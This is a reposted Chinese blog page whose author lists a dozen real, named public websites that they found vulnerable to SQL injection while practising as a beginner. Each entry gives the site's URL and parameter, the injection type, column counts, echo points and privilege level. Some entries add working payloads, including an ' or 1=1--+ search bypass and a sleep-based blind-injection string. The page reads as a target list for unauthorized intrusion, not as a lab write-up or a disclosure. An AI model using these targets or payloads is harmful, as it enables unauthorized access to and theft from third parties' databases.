当前位置: 首页 > article >正文

存在sql注入的公网站点

article 2024/11/4 17:40:56

此数据为博主在新手阶段练习sql注入时发现的站点,漏洞可能修复,备注可能错误

url: https://www.uni-1.com.hk/about_en.php?id=2
注入点类型:数值
sql报错回显:无
sql语句执行:[order by] [union]
字段数:14
回显点:12,13,14


url: https://atmos.mora.com.pl/blank.php?id=19088
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
回显点:1,2,3
用户权限:低

https://www.csi-india.org/news/index.php?id=18
注入点类型:数值
sql报错回显:无
sql语句执行:顺利
字段数:8
回显点:3,4,5,6

http://jwsm.cc/blank.php?id=136
注入点类型:num
sql报错回显:无
权限:普通

https://esjindex.org/search.php?id=2
注入点类型:字符 
异常载荷:' 
sql报错回显:存在
字段:22
union联合查询失效
sleep判断失效

http://www.qdbohai.com/project/list.php
注入点类型:搜索框
传参类型:post传参
输出[all]载荷:keywords=aaaa' or 1=1--+

https://www.sunchampion.com/about.php?id=41
注入点类型:数值
传参类型:get
sql报错回显:存在
回显点:存在
sql报错盲注载荷:exreactvalue

url:https://www.zenith.edu.hk/tc/school.php?id=35
注入点:id=35
类型:str
sql报错回显:存在
页面回显:无,页面自动跳转
sql报错盲注载荷:exreactvalue
comment:union非法混合,

url:https://abp.bzh/article.php?id=31347
类型:str
sql报错回显:存在
页面回显:无
注入方式:sleep延时盲注
comment:order by失效,union失效
盲注载荷:' and if((length(database()))=13,sleep(0),sleep(5)) --+

url:https://www.ciritas.ru/faq2.php?id=2
类型:str

url:https://uppo.pt/announce.php?id=136
类型:str
sql报错回显:无
字段数:19
comment:union失效,403

url:https://www.spbigbag.com/news_view.php?id=1
类型:str


http://www.kler.cn/a/378997.html

相关文章:

  • C#属性 Property
  • docker pull 拉取镜像失败,使用Docker离线包
  • GO语言基础(三)
  • 基于 Canal + Elasticsearch 的业务操作日志解决方案
  • HTML 框架
  • 【Java知识】Java基础-对象排序的实现
  • selenium无头浏览器截图并以邮件发送
  • C++学习笔记----10、模块、头文件及各种主题(一)---- 模块(1)
  • 网络安全法详细介绍——爬虫教程
  • 华为设备配置端口隔离实验
  • FreeRTOS 中的列表与列表项详解
  • java基础day08
  • 数据结构,问题 B: 反向输出
  • 探索智能投顾:正大金融数据分析如何优化市场策略
  • DICOM标准:CR图像模块属性详解——计算放射线照相术(CR)及其在DICOM中的表示
  • 《数字图像处理基础》学习05-数字图像的灰度直方图
  • VMware workstation的3种网络类型
  • 【Hive sql 面试题】统计Top3歌单以及每个Top3歌单下的Top3歌曲(难)
  • 【青牛科技】GC4931P替代A4931/Allegro在水泵、筋膜枪、吸尘器和电动工具中的应用
  • 多角色AI代理的一次尝试- AI代码助手
  • Redis 数据备份与恢复
  • GOF的C++软件设计模式的分类和模式名称
  • 系统架构设计师(软考高级)一站式通关课程
  • JSON交互处理
  • 网络规划设计师-(4)数据调制与编码
  • 基于matlab的人脸识别系统设计与仿真